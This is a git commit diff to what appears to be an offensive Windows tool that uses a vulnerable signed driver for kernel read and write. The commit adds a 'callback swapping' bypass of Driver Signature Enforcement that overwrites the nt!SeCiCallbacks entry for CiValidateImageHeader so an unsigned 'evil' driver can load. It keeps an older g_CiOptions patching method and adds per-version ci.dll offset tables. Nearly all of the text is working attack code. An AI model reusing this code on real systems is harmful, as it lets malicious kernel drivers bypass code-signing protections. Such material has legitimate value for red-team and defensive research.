DSE bypass : implemented "callback swapping" method

The new default method for unsigned driver loading uses a KDP compatible technique, since it does not overwrite the protected variable g_CiOptions. Based on the work of: https://github.com/0mWindyBug/KDP-compatible-driver-loader Co-authored-by: Windy Bug <139051196+0mWindyBug@users.noreply.github.com>
2026-06-11 01:41:20 +00:00 · 2023-11-03 14:38:01 +01:00
parent 15c3b706f1
commit f15471d12c
12 changed files with 1408 additions and 1015 deletions
@@ -13,14 +13,15 @@
 enum CiOffsetType {
    g_CiOptions = 0,
    CiValidateImageHeader,
    _SUPPORTED_CI_OFFSETS_END
 };
 union CiOffsets {
    // structure version of Ci.dll's offsets
    struct {
        // Ci.dll's g_CiOptions
        DWORD64 g_CiOptions;
        DWORD64 CiValidateImageHeader;
    } st;
    // array version (usefull for code factoring)
@@ -30,8 +31,10 @@ union CiOffsets {
 union CiOffsets g_ciOffsets;
 // Return the offsets of CI!g_CiOptions for the specific Windows version in use.
-void LoadCiOffsetsFromFile(TCHAR* CiOffsetFilename);
+BOOL LoadCiOffsets(_In_opt_ TCHAR* ciOffsetFilename, BOOL canUseInternet);
 BOOL CiOffsetsAreLoaded();
 BOOL LoadCiOffsetsFromFile(TCHAR* CiOffsetFilename);
 void SaveCiOffsetsToFile(TCHAR* CiOffsetFilename);
-void LoadCiOffsetsFromInternet(BOOL delete_pdb);
+BOOL LoadCiOffsetsFromInternet(BOOL delete_pdb);
 LPTSTR GetCiVersion();
 LPTSTR GetCiPath();
@@ -1,5 +1,7 @@
 #pragma once
 #include <Windows.h>
 PBYTE ReadFullFileW(LPCWSTR fileName);
 BOOL FileExistsA(LPCSTR szPath);
@@ -8,6 +8,21 @@
 #define PRINT_ERROR_AUTO(func) _tprintf_or_not(TEXT("[!] ERROR ") TEXT(__FUNCTION__) TEXT(" ; ") func TEXT(" (0x%08x)\n"), GetLastError())
 #endif
 enum dseDisablingMethods_e {
    G_CIOPTIONS_PATCHING,
    CALLBACK_SWAPPING,
 };
 BOOLEAN IsCiEnabled();
 DWORD64  FindCIBaseAddress();
 BOOL patch_gCiOptions(DWORD64 CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue);
 BOOL disableDSE(enum dseDisablingMethods_e method, BOOL verbose);
 BOOL reenableDSE(enum dseDisablingMethods_e method, BOOL verbose);
 BOOL disableDSEbyCallbackSwapping(DWORD64* oldCiValidateImageHeaderEntryAddr);
 BOOL reenableDSEbyCallbackSwapping(DWORD64 ciValidateImageHeaderEntryAddr);
 BOOL disableDSEbyPatchingCiOptions(BOOL verbose, _Out_ ULONG* OldCiOptionsValue);
 BOOL reenableDSEbyPatchingCiOptions(ULONG OldCiOptionsValue);
@@ -11,7 +11,7 @@
 enum NtoskrnlOffsetType {
-    CREATE_PROCESS_ROUTINE,
+    CREATE_PROCESS_ROUTINE = 0,
    CREATE_THREAD_ROUTINE,
    LOAD_IMAGE_ROUTINE,
    PROTECTION_LEVEL,
@@ -21,6 +21,7 @@ enum NtoskrnlOffsetType {
    PSPROCESSTYPE,
    PSTHREADTYPE,
    OBJECT_TYPE_CALLBACKLIST,
    SECICALLBACKS,
    _SUPPORTED_NTOSKRNL_OFFSETS_END
 };
@@ -47,6 +48,8 @@ union NtoskrnlOffsets {
        DWORD64 psThreadType;
        // ntoskrnl _OBJECT_TYPE's CallbackList symbol offset
        DWORD64 object_type_callbacklist;
        // ntoskrnl SeCiCallbacks array
        DWORD64 seCiCallbacks;
    } st;
    // array version (usefull for code factoring)
@@ -71,3 +74,5 @@ BOOL NtoskrnlAllKernelCallbacksOffsetsArePresent();
 BOOL NtoskrnlNotifyRoutinesOffsetsArePresent();
 BOOL NtoskrnlEtwtiOffsetsArePresent();
 BOOL NtoskrnlObjectCallbackOffsetsArePresent();
 LPTSTR GetNtoskrnlPath();
@@ -1,6 +1,8 @@
-#include "windows.h"
+#include <windows.h>
 #include <winternl.h>
 #include "CiOffsets.h"
 #include "KernelDSE.h"
 #include "winternl.h"
 #include "KernelCallbacks.h"
 #include "NtoskrnlOffsets.h"
 #include "PrintFunctions.h"
@@ -8,8 +10,7 @@
 #include "KernelUtils.h"
 #include "tchar.h"
-
+BOOLEAN IsCiEnabled()
 BOOLEAN IsCiEnabled()
 {
    SYSTEM_CODEINTEGRITY_INFORMATION CiInfo = { sizeof(SYSTEM_CODEINTEGRITY_INFORMATION) };
    const NTSTATUS Status = NtQuerySystemInformation(SystemCodeIntegrityInformation,
@@ -23,20 +24,144 @@
        (CODEINTEGRITY_OPTION_ENABLED | CODEINTEGRITY_OPTION_TESTSIGN)) == CODEINTEGRITY_OPTION_ENABLED;
 }
- DWORD64 FindCIBaseAddress() {
+DWORD64 FindCIBaseAddress() {
    DWORD64 CiBaseAddress = FindKernelModuleAddressByName(TEXT("CI.dll"));
    return CiBaseAddress;
- }
+}
- /*
+/*
- * Patches the gCiOptions global variable in CI.dll module to enable/disable DSE
+* Patches the gCiOptions global variable in CI.dll module to enable/disable DSE
- * Warning: this technique does not work with KDP enabled (by default on Win 11).
+* Warning: this technique does not work with KDP enabled (by default on Win 11).
- * TODO: see https://www.fortinet.com/blog/threat-research/driver-signature-enforcement-tampering for ideas of new bypasses
+*/
- */
+BOOL patch_gCiOptions(DWORD64 CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue) {//PRFIX : not KDP proof
 BOOL patch_gCiOptions(DWORD64 CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue) {//PRFIX : not KDP proof
    *OldCiOptionsValue = ReadMemoryDWORD(CiVariableAddress);
    //printf("[+KERNELDSE] The value of gCI at 0x%llx is 0x%x.\n", CiVariableAddress, *OldCiOptionsValue);
    WriteMemoryDWORD(CiVariableAddress, CiOptionsValue);
    //printf("[+KERNELDSE] New value of gCI at 0x%llx is 0x%x.\n", CiVariableAddress, ReadMemoryDWORD64(CiVariableAddress));
    return TRUE;
 }
 BOOL disableDSEbyPatchingCiOptions(BOOL verbose, _Out_ ULONG* OldCiOptionsValue) {
    *OldCiOptionsValue = 0;
    if (!CiOffsetsAreLoaded()) {
        return FALSE;
    }
    DWORD64 CiBaseAddress = FindCIBaseAddress();
    if (!CiBaseAddress) {
        _putts_or_not(TEXT("[-] CI base address not found !\n"));
        return FALSE;
    }
    DWORD64 g_CiOptionsAddress = CiBaseAddress + g_ciOffsets.st.g_CiOptions;
    if (verbose)
        _tprintf_or_not(TEXT("[+] [DSE-g_CiOptions patching] CI.dll kernel base address found at 0x%llx. The g_CiOptions is at %llx !\n"), CiBaseAddress, g_CiOptionsAddress);
    ULONG CiOptionsValue = 0;
    return patch_gCiOptions(g_CiOptionsAddress, CiOptionsValue, OldCiOptionsValue);
 }
 BOOL reenableDSEbyPatchingCiOptions(ULONG OldCiOptionsValue) {
    if (!CiOffsetsAreLoaded()) {
        return FALSE;
    }
    DWORD64 CiBaseAddress = FindCIBaseAddress();
    if (!CiBaseAddress) {
        _putts_or_not(TEXT("[-] CI base address not found !\n"));
        return FALSE;
    }
    DWORD64 g_CiOptionsAddress = CiBaseAddress + g_ciOffsets.st.g_CiOptions;
    ULONG tmp;
    return patch_gCiOptions(g_CiOptionsAddress, OldCiOptionsValue, &tmp);
 }
 DWORD64 locateCiValidateImageHeaderEntry()
 {
    DWORD64 seCiCallbacksAddr = FindNtoskrnlBaseAddress() + g_ntoskrnlOffsets.st.seCiCallbacks;
    _tprintf_or_not(TEXT("[*] [DSE-callback swapping] SeCiCallbacks array's address: %p\n"), (PVOID)seCiCallbacksAddr);
    DWORD64 ciValidateImageHeaderAddr = FindCIBaseAddress() + g_ciOffsets.st.CiValidateImageHeader;
    _tprintf_or_not(TEXT("[*] [DSE-callback swapping] Looking for entry equals to CiValidateImageHeader (%p)\n"), (PVOID)ciValidateImageHeaderAddr);
    DWORD64 zwFlushInstructionCache = GetKernelFunctionAddress("ZwFlushInstructionCache");
    if (zwFlushInstructionCache == 0) {
        return FALSE;
    }
    DWORD64 ciValidateImageHeaderEntryAddr = 0;
    for (DWORD64 i = 0; i < 0x100; i += 8) {
        DWORD64 entry = ReadMemoryDWORD64(seCiCallbacksAddr + i);
        DWORD64 driverOffset;
        TCHAR* driverEntry = FindDriverName(entry, &driverOffset);
        _tprintf_or_not(TEXT("[*] [DSE-callback swapping] [0x%016llx (seCiCallbacks + 0x%llx)]\t\t= 0x%016llx (%s + 0x%llx)\n"), seCiCallbacksAddr + i, i, entry, driverEntry, driverOffset);
        if (entry == ciValidateImageHeaderAddr || entry == zwFlushInstructionCache) {
            ciValidateImageHeaderEntryAddr = seCiCallbacksAddr + i;
            break;
        }
    }
    if (!ciValidateImageHeaderEntryAddr) {
        _tprintf_or_not(TEXT("[-] [DSE-callback swapping] Failed to locate an entry in SeCiCallbacks pointing at Ci!CiValidateImageHeader\n"));
        return 0;
    }
    _tprintf_or_not(TEXT("[*] [DSE-callback swapping] Found the Ci!CiValidateImageHeader in the array at %p\n"), (PVOID)ciValidateImageHeaderEntryAddr);
    return ciValidateImageHeaderEntryAddr;
 }
 /*
 * Replace the entry in nt!SeCiCallbacks pointing at Ci!CiValidateImageHeader by ZwFlushInstructionCache,
 * i.e. a function that does nothing but returning 0
 */
 BOOL disableDSEbyCallbackSwapping(DWORD64* oldCiValidateImageHeaderEntryAddr) {
    DWORD64 ciValidateImageHeaderEntryAddr = locateCiValidateImageHeaderEntry();
    if (ciValidateImageHeaderEntryAddr == 0) {
        return FALSE;
    }
    // Resolving the kernel nt!zwFlushInstructionCache address
    DWORD64 zwFlushInstructionCache = GetKernelFunctionAddress("ZwFlushInstructionCache");
    if (zwFlushInstructionCache == 0) {
        return FALSE;
    }
    WriteMemoryDWORD64(ciValidateImageHeaderEntryAddr, zwFlushInstructionCache);
    _tprintf_or_not(TEXT("[+] Successfully disabled DSE by overwriting Ci!CiValidateImageHeader\n"));
    *oldCiValidateImageHeaderEntryAddr = ciValidateImageHeaderEntryAddr;
    return TRUE;
 }
 BOOL reenableDSEbyCallbackSwapping(DWORD64 ciValidateImageHeaderEntryAddr) {
    DWORD64 ciValidateImageHeaderAddr = FindCIBaseAddress() + g_ciOffsets.st.CiValidateImageHeader;
    WriteMemoryDWORD64(ciValidateImageHeaderEntryAddr, ciValidateImageHeaderAddr);
    _tprintf_or_not(TEXT("[+] Successfully reenabled DSE by restoring Ci!CiValidateImageHeader entry in SeCiCallbacks\n"));
    return TRUE;
 }
 ULONG g_OldCiOptionsValue;
 DWORD64 oldCiValidateImageHeaderEntryAddr;
 BOOL disableDSE(enum dseDisablingMethods_e method, BOOL verbose) {
    switch (method) {
    case G_CIOPTIONS_PATCHING:
        return disableDSEbyPatchingCiOptions(verbose, &g_OldCiOptionsValue);
    case CALLBACK_SWAPPING:
        return disableDSEbyCallbackSwapping(&oldCiValidateImageHeaderEntryAddr);
    default:
        _tprintf_or_not(TEXT("Invalid DSE disabling method, aborting..."));
        exit(1);
    }
 }
 BOOL reenableDSE(enum dseDisablingMethods_e method, BOOL verbose) {
    (void)verbose;
    switch (method) {
    case G_CIOPTIONS_PATCHING:
        return reenableDSEbyPatchingCiOptions(g_OldCiOptionsValue);
    case CALLBACK_SWAPPING:
        return reenableDSEbyCallbackSwapping(oldCiValidateImageHeaderEntryAddr);
    default:
        _tprintf_or_not(TEXT("Invalid DSE disabling method, aborting..."));
        exit(1);
    }
 }
@@ -76,6 +76,13 @@ TCHAR* FindDriverName(DWORD64 address, _Out_opt_ PDWORD64 offset) {
        return NULL;
    }
    if (minDiff == MAXDWORD64) {
        if (offset) {
            *offset = address;
        }
        return NULL;
    }
    if (GetDeviceDriverBaseName((LPVOID)(address - minDiff), szDriver, _countof(szDriver))) {
        if (offset) {
@@ -9,6 +9,7 @@
 #include <tchar.h>
 #include <stdio.h>
 #include "FileUtils.h"
 #include "FileVersion.h"
 #include "PdbSymbols.h"
 #include "PrintFunctions.h"
@@ -17,8 +18,48 @@
 union CiOffsets g_ciOffsets = { 0 };
 BOOL CiOffsetsAreLoaded() {
    return g_ciOffsets.ar[0] != 0;
 }
 BOOL LoadCiOffsets(_In_opt_ TCHAR* ciOffsetFilename, BOOL canUseInternet) {
    if (CiOffsetsAreLoaded()) {
        //offsets already loaded
        return TRUE;
    }
    // load via CSV first
    if (ciOffsetFilename && FileExists(ciOffsetFilename)) {
        if (LoadCiOffsetsFromFile(ciOffsetFilename)) {
            return TRUE;
        }
        _putts_or_not(TEXT("[!] Offsets are missing from the CSV for the version of ci in use."));
    }
    // load via internet then
    if (canUseInternet) {
        _putts_or_not(TEXT("[+] Downloading ci related offsets from the MS Symbol Server (will drop a .pdb file in current directory)"));
 #if _DEBUG
        if (LoadCiOffsetsFromInternet(FALSE)) {
 #else
        if (LoadCiOffsetsFromInternet(TRUE)) {
 #endif
            _putts_or_not(TEXT("[+] Downloading offsets succeeded !"));
            if (ciOffsetFilename && FileExists(ciOffsetFilename)) {
                _putts_or_not(TEXT("[+] Saving them to the CSV file..."));
                SaveCiOffsetsToFile(ciOffsetFilename);
            }
            return TRUE;
        }
        _putts_or_not(TEXT("[-] Downloading offsets from the internet failed !"));
    }
    return FALSE;
 }
 // Return the offsets of CI!g_CiOptions for the specific Windows version in use.
-void LoadCiOffsetsFromFile(TCHAR* ciOffsetFilename) {
+BOOL LoadCiOffsetsFromFile(TCHAR* ciOffsetFilename) {
    LPTSTR ciVersion = GetCiVersion();
    _tprintf_or_not(TEXT("[*] System's ci.dll file version is: %s\n"), ciVersion);
@@ -27,7 +68,7 @@ void LoadCiOffsetsFromFile(TCHAR* ciOffsetFilename) {
    if (offsetFileStream == NULL) {
        _putts_or_not(TEXT("[!] Ci offsets CSV file not found / invalid. A valid offset file must be specifed!"));
-        return;
+        return FALSE;
    }
    TCHAR lineCiVersion[256];
@@ -46,9 +87,10 @@ void LoadCiOffsetsFromFile(TCHAR* ciOffsetFilename) {
        }
    }
    fclose(offsetFileStream);
    return g_ciOffsets.ar[0] != 0;
 }
-void SaveCiOffsetsToFile(TCHAR* ciOffsetFilename) {
+void SaveCiOffsetsToFile(TCHAR * ciOffsetFilename) {
    LPTSTR ciVersion = GetCiVersion();
    FILE* offsetFileStream = NULL;
@@ -63,20 +105,22 @@ void SaveCiOffsetsToFile(TCHAR* ciOffsetFilename) {
    for (int i = 0; i < _SUPPORTED_CI_OFFSETS_END; i++) {
        _ftprintf(offsetFileStream, TEXT(",%llx"), g_ciOffsets.ar[i]);
    }
-    _fputts(TEXT(""), offsetFileStream);
+    _ftprintf(offsetFileStream, TEXT("\n"));
    fclose(offsetFileStream);
 }
-void LoadCiOffsetsFromInternet(BOOL delete_pdb) {
+BOOL LoadCiOffsetsFromInternet(BOOL delete_pdb) {
    LPTSTR ciPath = GetCiPath();
    symbol_ctx* sym_ctx = LoadSymbolsFromImageFile(ciPath);
    if (sym_ctx == NULL) {
-        return;
+        return FALSE;
    }
    g_ciOffsets.st.g_CiOptions = GetSymbolOffset(sym_ctx, "g_CiOptions");
    g_ciOffsets.st.CiValidateImageHeader = GetSymbolOffset(sym_ctx, "CiValidateImageHeader");
    UnloadSymbols(sym_ctx, delete_pdb);
    return CiOffsetsAreLoaded();
 }
 TCHAR g_ciPath[MAX_PATH] = { 0 };
@@ -92,6 +92,7 @@ void LoadNtoskrnlOffsetsFromInternet(BOOL delete_pdb) {
    g_ntoskrnlOffsets.st.psProcessType = GetSymbolOffset(sym_ctx, "PsProcessType");
    g_ntoskrnlOffsets.st.psThreadType = GetSymbolOffset(sym_ctx, "PsThreadType");
    g_ntoskrnlOffsets.st.object_type_callbacklist = GetFieldOffset(sym_ctx, "_OBJECT_TYPE", L"CallbackList");
    g_ntoskrnlOffsets.st.seCiCallbacks = GetSymbolOffset(sym_ctx, "SeCiCallbacks");
    UnloadSymbols(sym_ctx, delete_pdb);
 }
@@ -94,6 +94,7 @@ int _tmain(int argc, TCHAR** argv) {
    [--nt-offsets <NtoskrnlOffsets.csv>] [--wdigest-offsets <WdigestOffsets.csv>] [--ci-offsets <CiOffsets.csv>] [--internet]\n\
    [--vuln-driver <RTCore64.sys>] [--vuln-service <SERVICE_NAME>] \n\
    [--unsigned-driver <evil.sys>] [--unsigned-service <SERVICE_NAME>] \n\
    [--no-kdp]\n\
 [-o | --dump-output <DUMP_FILE>]\n");
    const TCHAR extendedUsage[] = TEXT("\n\
 -h | --help             Show this help message and exit.\n\
@@ -160,6 +161,7 @@ Driver sideloading options:\n\
 --unsigned-driver <evil.sys>            Path to the unsigned driver file.\n\
                                        Default to 'evil.sys' in the current directory.\n\
 --unsigned-service <SERVICE_NAME>       Name of the unsigned driver's service to intall / start.\n\
 --no-kdp                                Switch to g_CiOptions patching method for disabling DSE (default is callback swapping).\n\
 \n\
 \n\
 Offset-related options:\n\
@@ -198,6 +200,7 @@ Dump options:\n\
    TCHAR unsignedDriverPath[MAX_PATH] = { 0 };
    TCHAR driverDefaultName[] = DEFAULT_DRIVER_FILE;
    TCHAR evilDriverDefaultName[] = DEFAULT_EVIL_DRIVER_FILE;
    enum dseDisablingMethods_e dseMethod = CALLBACK_SWAPPING;
    TCHAR ntoskrnlOffsetCSVPath[MAX_PATH] = { 0 };
    TCHAR wdigestOffsetCSVPath[MAX_PATH] = { 0 };
    TCHAR ciOffsetCSVPath[MAX_PATH] = { 0 };
@@ -291,6 +294,9 @@ Dump options:\n\
            }
            SetEvilDriverServiceName(argv[i]);
        }
        else if (_tcsicmp(argv[i], TEXT("--no-kdp")) == 0) {
            dseMethod = G_CIOPTIONS_PATCHING;
        }
        else if (_tcsicmp(argv[i], TEXT("--nt-offsets")) == 0) {
            i++;
            if (i > argc) {
@@ -536,8 +542,11 @@ Dump options:\n\
    }
    if (startMode != audit) {
-
+#ifdef _DEBUG
        if (1) {
 #else
        if (isSafeToExecutePayloadKernelland && (isSafeToExecutePayloadUserland || directSyscalls)) {
 #endif
            _putts_or_not(TEXT("[+] Process is \"safe\" to launch our payload\n"));
            // Do the operation the tool was started for.
@@ -713,77 +722,49 @@ Dump options:\n\
            case load_unsigned_driver:
            {
                if (_tcslen(ciOffsetCSVPath) == 0) {
-                    TCHAR CiOffsetCSVName[] = TEXT("\\CiOffsets.csv");
+                    PathAppend(ciOffsetCSVPath, currentFolderPath);
-                    _tcsncat_s(ciOffsetCSVPath, _countof(ciOffsetCSVPath), currentFolderPath, _countof(currentFolderPath));
+                    PathAppend(ciOffsetCSVPath, TEXT("\\CiOffsets.csv"));
                    _tcsncat_s(ciOffsetCSVPath, _countof(ciOffsetCSVPath), CiOffsetCSVName, _countof(CiOffsetCSVName));
                }
-                if (FileExists(ciOffsetCSVPath)) {
+                BOOL ciOffsetsWereLoaded = LoadCiOffsets(ciOffsetCSVPath, internet);
                    LoadCiOffsetsFromFile(ciOffsetCSVPath);
                    if (g_ciOffsets.st.g_CiOptions == 0x0) {
                        _putts_or_not(TEXT("[!] Offsets are missing from the CSV for the version of ci in use."));
                    }
                    else {
                        if (verbose) {
                            _tprintf_or_not(TEXT("[+] g_CiOptions offset found using %s file : 0x%llx\n"), ciOffsetCSVPath, g_ciOffsets.st.g_CiOptions);
                        }
                    }
                }
-                if (internet && (g_ciOffsets.st.g_CiOptions == 0x0)) {
+                if (!ciOffsetsWereLoaded) {
                    _putts_or_not(TEXT("[+] Downloading ci related offsets from the MS Symbol Server (will drop a .pdb file in current directory)"));
 #if _DEBUG
                    LoadCiOffsetsFromInternet(FALSE);
 #else
                    LoadCiOffsetsFromInternet(TRUE);
 #endif
                    if (g_ciOffsets.st.g_CiOptions == 0x0) {
                        _putts_or_not(TEXT("[-] Downloading offsets from the internet failed !"));
                    }
                    else {
                        _putts_or_not(TEXT("[+] Downloading offsets succeeded !"));
                        if (FileExists(ciOffsetCSVPath)) {
                            _putts_or_not(TEXT("[+] Saving them to the CSV file..."));
                            SaveCiOffsetsToFile(ciOffsetCSVPath);
                        }
                    }
                    if (verbose) {
                        _tprintf_or_not(TEXT("[+] g_CiOptions offset found using internet MS Symbol Server : 0x%llx\n"), g_ciOffsets.st.g_CiOptions);
                    }
                }
                if (g_ciOffsets.st.g_CiOptions == 0x0) {
                    _putts_or_not(TEXT("[!] The offsets must be computed using the provided script and added to the offsets CSV file (or use --internet). Unsigned driver won't be loaded ...\n"));
                    lpExitCode = EXIT_FAILURE;
                    break;
                }
-                else {
+
                _putts_or_not(TEXT(""));
-                    if (kernelMode) {
+                if (!kernelMode) {
-                        DWORD64 CiBaseAddress = 0;
+                    lpExitCode = EXIT_FAILURE;
-                        DWORD64 g_CiOptionsAddress = 0;
+                    break;
                        if (IsCiEnabled())
                        {
                            CiBaseAddress = FindCIBaseAddress();
                            if (!CiBaseAddress) {
                                _putts_or_not(TEXT("[-] CI base address not found !\n"));
                }
                            else {
                                g_CiOptionsAddress = CiBaseAddress + g_ciOffsets.st.g_CiOptions;
                                if (verbose)
                                    _tprintf_or_not(TEXT("[+] CI.dll kernel base address found at 0x%llx. The g_CiOptions is at %llx !\n"), CiBaseAddress, g_CiOptionsAddress);
                if (_tcslen(unsignedDriverPath) == 0) {
                    PathAppend(unsignedDriverPath, currentFolderPath);
                    PathAppend(unsignedDriverPath, evilDriverDefaultName);
                }
                if (!FileExists(unsignedDriverPath)) {
                    _tprintf_or_not(TEXT("[!] Required driver file not present at %s\nExiting...\n"), unsignedDriverPath);
-                                    return EXIT_FAILURE;
+                    lpExitCode = EXIT_FAILURE;
                    break;
                }
-                                _putts_or_not(TEXT("[+] Using the vulnerable driver to disable CI..."));  // debug print
+
-                                ULONG CiOptionsValue = 0;
+                BOOL ciWasEnabled = IsCiEnabled();
-                                ULONG OldCiOptionsValue;
+                if (ciWasEnabled)
-                                patch_gCiOptions(g_CiOptionsAddress, CiOptionsValue, &OldCiOptionsValue);
+                {
                    BOOL disablingWasSuccessful = disableDSE(dseMethod, verbose);
                    if (!disablingWasSuccessful) {
                        _putts_or_not(TEXT("[-] DSE could not have been disabled, aborting ...\n"));
                        lpExitCode = EXIT_FAILURE;
                        break;
                    }
                    _putts_or_not(TEXT("[+] DSE is now disabled"));
                }
                else {
                    _putts_or_not(TEXT("[-] CI is already disabled!\n"));
                }
                LPTSTR evilServiceNameIfAny = NULL;
                BOOL isEvilDriverAlreadyRunning = IsDriverServiceRunning(unsignedDriverPath, &evilServiceNameIfAny);
                if (isEvilDriverAlreadyRunning) {
@@ -793,20 +774,23 @@ Dump options:\n\
                else {
                    _putts_or_not(TEXT("[+] Installing evil driver..."));
                    status = InstallEvilDriver(unsignedDriverPath);
-                                    if (status != TRUE)
+                    if (status != TRUE) {
                        _putts_or_not(TEXT("[!] An error occurred while installing the evil driver"));
-                                }
+                        lpExitCode = EXIT_FAILURE;
-                                _putts_or_not(TEXT("[+] Using the vulnerable driver to reset original CI status"));  // debug print
+                        break;
                                patch_gCiOptions(g_CiOptionsAddress, OldCiOptionsValue, &OldCiOptionsValue);
                    }
                }
-                        else {
+                if (ciWasEnabled) {
-                            // CI is already disabled, just load the driver
+                    BOOL reenablingWasSuccessful = reenableDSE(dseMethod, verbose);
-                            // TODO FIX : logic error, evil driver is not loadded if DSE is already disabled
+                    if (!reenablingWasSuccessful) {
-                            _putts_or_not(TEXT("[-] CI is already disabled!\n")); // debug print
+                        _putts_or_not(TEXT("[-] DSE could not have been re-enabled; WARNING: this might trigger a PatchGuard BSoD in the following minutes...\n"));
-                        }
+                        lpExitCode = EXIT_FAILURE;
                        break;
                    }
                    _putts_or_not(TEXT("[+] DSE is enabled again"));
                }
                break;
            }
            }
@@ -1,186 +1,360 @@
-g_CiOptionsOffset
+ciVersion,g_CiOptions,CiValidateImageHeader
-ci_10240-17673.dll,16c10
+ci_10240-16384.dll,16c10,26f90
-ci_10240-17797.dll,16c10
+ci_10240-17319.dll,16c10,271e0
-ci_10240-17861.dll,16c10
+ci_10240-17673.dll,16c10,27200
-ci_10240-17831.dll,16c10
+ci_10240-17797.dll,16c10,27200
-ci_10240-17319.dll,16c10
+ci_10240-17831.dll,16c10,27200
-ci_10240-17889.dll,16c10
+ci_10240-17861.dll,16c10,27200
-ci_10240-17976.dll,16c10
+ci_10240-17889.dll,16c10,27390
-ci_10240-16384.dll,16c10
+ci_10240-17976.dll,16c10,273b0
-ci_10240-19119.dll,16c10
+ci_10240-18275.dll,16c10,273b0
-ci_10586-0.dll,16c30
+ci_10240-18609.dll,16c10,273b0
-ci_10586-1232.dll,16c30
+ci_10240-19119.dll,16c10,273b0
-ci_10586-1478.dll,16c30
+ci_10240-19509.dll,16c10,273e0
-ci_14393-0.dll,19b50
+ci_10240-20048.dll,16c10,273e0
-ci_10586-839.dll,16c30
+ci_10240-20107.dll,16c10,273e0
-ci_10586-1540.dll,16c30
+ci_10240-20232.dll,16c10,273e0
-ci_14393-2214.dll,19b50
+ci_10586-0.dll,16c30,27290
-ci_14393-2273.dll,19b50
+ci_10586-839.dll,16c30,27290
-ci_14393-2248.dll,19b50
+ci_10586-1232.dll,16c30,272b0
-ci_14393-206.dll,19b50
+ci_10586-1478.dll,16c30,272b0
-ci_14393-2312.dll,19b50
+ci_10586-1540.dll,16c30,272b0
-ci_14393-2189.dll,19b50
+ci_14393-0.dll,19b50,2b400
-ci_14393-2339.dll,19b50
+ci_14393-206.dll,19b50,2b400
-ci_14393-2395.dll,19b50
+ci_14393-726.dll,19b50,2b400
-ci_14393-2485.dll,19b50
+ci_14393-953.dll,19b50,2b400
-ci_14393-3053.dll,19b50
+ci_14393-2189.dll,19b50,2b440
-ci_14393-3115.dll,19b50
+ci_14393-2214.dll,19b50,2b440
-ci_14393-3297.dll,19b50
+ci_14393-2248.dll,19b50,2b440
-ci_14393-3323.dll,19b50
+ci_14393-2273.dll,19b50,2b440
-ci_14393-2636.dll,19b50
+ci_14393-2312.dll,19b50,2b5c0
-ci_14393-3383.dll,19b50
+ci_14393-2339.dll,19b50,2b5c0
-ci_14393-3930.dll,19b70
+ci_14393-2395.dll,19b50,2b5c0
-ci_14393-4350.dll,19b70
+ci_14393-2485.dll,19b50,2b5d0
-ci_14393-4583.dll,19b70
+ci_14393-2636.dll,19b50,2b5d0
-ci_14393-4704.dll,19b70
+ci_14393-3053.dll,19b50,2b5d0
-ci_14393-4770.dll,19b70
+ci_14393-3115.dll,19b50,2b5d0
-ci_14393-3986.dll,19b70
+ci_14393-3297.dll,19b50,2b5d0
-ci_14393-5125.dll,19b70
+ci_14393-3323.dll,19b50,2b5d0
-ci_14393-4530.dll,19b70
+ci_14393-3383.dll,19b50,2b5d0
-ci_14393-5006.dll,19b70
+ci_14393-3930.dll,19b70,2b5d0
-ci_14393-5501.dll,19b50
+ci_14393-3986.dll,19b70,2b5d0
-ci_14393-726.dll,19b50
+ci_14393-4350.dll,19b70,2b5d0
-ci_14393-953.dll,19b50
+ci_14393-4530.dll,19b70,2b5d0
-ci_15063-0.dll,1bbb0
+ci_14393-4583.dll,19b70,2b5f0
-ci_14393-5192.dll,19b50
+ci_14393-4704.dll,19b70,2b5f0
-ci_15063-1058.dll,1bbb0
+ci_14393-4770.dll,19b70,2b5f0
-ci_15063-1091.dll,1bbb0
+ci_14393-5006.dll,19b70,2b5f0
-ci_15063-1155.dll,1bbb0
+ci_14393-5125.dll,19b70,2b630
-ci_15063-1324.dll,1bbb0
+ci_14393-5192.dll,19b50,2b610
-ci_15063-1235.dll,1bbb0
+ci_14393-5501.dll,19b50,2b610
-ci_16299-95.dll,1cd10
+ci_14393-5582.dll,19b50,2b610
-ci_15063-296.dll,1bbb0
+ci_14393-5648.dll,19b50,2b610
-ci_15063-968.dll,1bbb0
+ci_14393-5850.dll,19b50,2b610
-ci_16299-15.dll,1cd10
+ci_14393-5921.dll,19b50,2b610
-ci_15063-877.dll,1bbb0
+ci_14393-5980.dll,19b50,2b610
-ci_16299-1565.dll,1dd10
+ci_14393-6167.dll,19b50,2b610
-ci_16299-246.dll,1cd10
+ci_15063-0.dll,1bbb0,2e5c0
-ci_16299-1268.dll,1dd10
+ci_15063-296.dll,1bbb0,2e5c0
-ci_16299-246.dll,1cd10
+ci_15063-877.dll,1bbb0,2e5e0
-ci_16299-246.dll,1cd10
+ci_15063-936.dll,1bbb0,2e5e0
-ci_16299-432.dll,1cd10
+ci_15063-968.dll,1bbb0,2e5e0
-ci_16299-10000.dll,1cd10
+ci_15063-1029.dll,1bbb0,2e5f0
-ci_16299-64.dll,1cd10
+ci_15063-1058.dll,1bbb0,2e5f0
-ci_16299-371.dll,1cd10
+ci_15063-1088.dll,1bbb0,2e5f0
-ci_17134-1.dll,1dcb0
+ci_15063-1091.dll,1bbb0,2e5f0
-ci_17134-1098.dll,1dc98
+ci_15063-1155.dll,1bbb0,2e770
-ci_16299-1087.dll,1cd10
+ci_15063-1235.dll,1bbb0,2e770
-ci_17134-1067.dll,1dc98
+ci_15063-1324.dll,1bbb0,2e780
-ci_17134-112.dll,1dcb0
+ci_15063-1897.dll,1bbb0,2e780
-ci_17134-228.dll,1dc98
+ci_15063-1928.dll,1bbb0,2e780
-ci_17134-2090.dll,1dc98
+ci_15063-1987.dll,1bbb0,2e780
-ci_17134-1130.dll,1dc98
+ci_15063-2045.dll,1bbb0,2e780
-ci_17134-285.dll,1dc98
+ci_15063-2223.dll,1bbb0,2e780
-ci_17134-829.dll,1dc98
+ci_16299-15.dll,1cd10,31430
-ci_17134-441.dll,1dc98
+ci_16299-64.dll,1cd10,31440
-ci_17134-80.dll,1dcb0
+ci_16299-95.dll,1cd10,31440
-ci_17134-885.dll,1dc98
+ci_16299-125.dll,1cd10,31440
-ci_17134-1006.dll,1dc98
+ci_16299-214.dll,1cd10,31440
-ci_17134-858.dll,1dc98
+ci_16299-246.dll,1cd10,31440
-ci_17763-253.dll,36d18
+ci_16299-248.dll,1cd10,31440
-ci_17134-950.dll,1dc98
